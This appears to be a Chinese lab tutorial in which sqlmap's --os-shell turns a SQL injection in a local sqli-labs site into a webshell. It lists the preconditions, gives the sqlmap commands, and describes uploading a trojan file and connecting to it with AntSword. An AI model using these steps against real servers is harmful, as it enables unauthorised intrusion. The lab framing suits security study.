1、–os-shell原理
使用udf提权获取webshell,也是通过into outfile向服务器写入两个文件,一个是可以直接执行系统命令,一个是进行上传文件。
–os-shell的执行条件:
- dbms为mysql,网站必须是root权限
- 攻击者需要知道网站的绝对路径
- magic_quotes_gpc = off,php主动转移功能关闭
2、环境介绍
phpstudy+sqlmap
3、探测网站根目录
python3 sqlmap.py -u "127.0.0.1/sqli-labs-master/Less-1/?id=1" --sql-shell select @@datadir
通过数据库位置,我们能简单判断
1.这是一个phpstudy搭建的站点
2.可以尝试phpstudy默认目录
3.尝试构造路径:D:\phpStudy\PHPTutorial\WWW\sqli-labs-master
常见找绝对路径方法:
1.网页报错信息
2.Phpinfo,探针
3.数据库查询,暴力破解
4、查看secure_file_priv= 的值是否为空
- 当secure_file_priv的值为null ,表示限制mysqld 不允许导入|导出
- 当secure_file_priv的值为/tmp/ ,表示限制mysqld 的导入|导出只能发生在/tmp/目录下
- 当secure_file_priv的值没有具体值时,表示不对mysqld 的导入|导出做限制
5、测试方法功能是否关闭
magic_quotes_gpc = off,php主动转移功能关闭
6、测试
python3 sqlmap.py -u 127.0.0.1/sqli-labs-master/Less-1/?id=1 --os-shell
选择网站语言
输入网站根目录
此时我们在本地可以发现上传了两个文件:
浏览起访问tmpueaad.php
上传木马文件:a.php
蚁剑成功连接: